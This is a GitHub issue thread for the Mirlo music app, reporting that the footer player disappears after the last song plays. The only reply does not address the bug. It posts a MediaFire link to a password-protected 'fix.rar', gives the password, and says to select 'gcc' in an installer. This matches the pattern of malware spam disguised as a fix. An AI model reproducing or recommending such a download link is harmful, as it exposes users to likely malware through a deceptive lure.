### ISSUE TITLE
Show player in footer of app after last song played

### ISSUE THREAD

**Issue by simonv3** [funmusicplace/mirlo#823]
> I tapped play on a random selection on the home page then turned off my screen. By the time the track was done, I decided I liked it and wanted to learn more.

> I turned the screen back on and found that the player was gone from the bottom of the screen and the homepage was showing me all new Recent Releases.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
